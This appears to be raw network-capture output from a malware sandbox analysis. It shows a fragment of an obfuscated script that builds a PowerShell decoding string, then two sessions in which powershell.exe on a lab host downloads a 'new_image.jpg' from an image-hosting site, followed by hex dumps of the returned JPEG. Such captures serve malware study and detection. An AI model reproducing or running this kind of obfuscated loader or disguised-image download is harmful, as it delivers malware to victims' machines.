2024-04-24 05:32:41 UTC	1369	IN	Data Raw: 28 e2 97 80 28 40 c3 b8 e2 98 9e 40 e2 88 9e 64 69 67 40 c3 b8 e2 98 9e 40 e2 88 9e 20 3d 20 27 22 29 20 26 20 62 75 61 6d 61 20 20 26 20 22 27 22 0d 0a 20 20 20 20 20 6f 75 76 69 73 74 6f 20 3d 20 6f 75 76 69 73 74 6f 20 26 20 22 3b 24 40 c3 b8 e2 98 9e 40 e2 88 9e 57 6a 75 78 64 20 3d 20 5b e2 87 9d e2 96 91 7d 40 2a 79 e2 87 9d e2 96 91 7d 40 2a 74 e2 98 9f c3 b0 2a 28 e2 98 a0 6d 2e 54 e2 98 9f c3 b0 2a 28 e2 98 a0 78 74 2e e2 98 9f c3 b0 2a 28 e2 98 a0 6e 28 40 28 e2 97 80 28 6f 64 69 6e 67 5d 3a 3a 55 6e 69 28 40 28 e2 97 80 28 6f 64 e2 98 9f c3 b0 2a 28 e2 98 a0 2e 47 e2 98 9f c3 b0 2a 28 e2 98 a0 74 53 74 72 69 6e 67 28 22 0d 0a 20 20 20 20 20 6f 75 76 69 73 74 6f 20 3d 20 6f 75 76 69 73 74 6f 20 26 20 22 5b e2 87 9d e2 96 91 7d 40 2a 79 e2 87 9d Data Ascii: ((@@dig@@ = '") & buama & "'" ouvisto = ouvisto & ";$@@Wjuxd = [}@y}@t(m.T(xt.(n(@((oding]::Uni(@((od(.G(tString(" ouvisto = ouvisto & "[}@y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	172.67.215.45	443	3248	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 05:32:44 UTC	124	OUT	GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-04-24 05:32:45 UTC	690	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 05:32:45 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT ETag: "66205484-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StL4b0EuB4lvCN3XT80eNVdcc56iz5J50W3IloCOVNq9bOk1rIcexxyAU9mDo7kueOVJ2YO1bOWYFF5UaTM6DHaUHofL%2FIUoGrj3KUScQyZWTmjHlAGXwPuPMmVHOj5r5Ew4L5%2Fpw2Uq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8793b6eb6f0d2ab8-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 05:32:45 UTC	679	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e Data Ascii: ccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC.J
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 Data Ascii: y2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 Data Ascii: r7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hd
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e Data Ascii: Pscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E.
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35 Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 Data Ascii: {b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6 Data Ascii: #MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 Data Ascii: nq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH5`C
2024-04-24 05:32:45 UTC	1369	IN	Data Raw: 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b Data Ascii: 2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v\|k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49166	172.67.215.45	443	3248	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 05:32:47 UTC	100	OUT	GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1 Host: uploaddeimagens.com.br
2024-04-24 05:32:47 UTC	696	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 05:32:47 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT ETag: "66205484-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 2 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x71SJ8FuCjv2Jt2anaWKTjwouLUpqg8vJtO8Ed7RnFw49rK6IM7EysEh%2B9oH7x3Mx9j1KAHnIqX2zTDOx9%2BQQYkRzNhFjc10siH%2FQudJEGXn3889Ovr5u%2BFG%2BHVvygye18z7lFYH0xcc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8793b6fcdb8b2b54-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 05:32:47 UTC	673	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b Data Ascii: %VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jk
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa Data Ascii: Tr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 Data Ascii: 2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
2024-04-24 05:32:47 UTC	1369	IN	Data Raw: 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
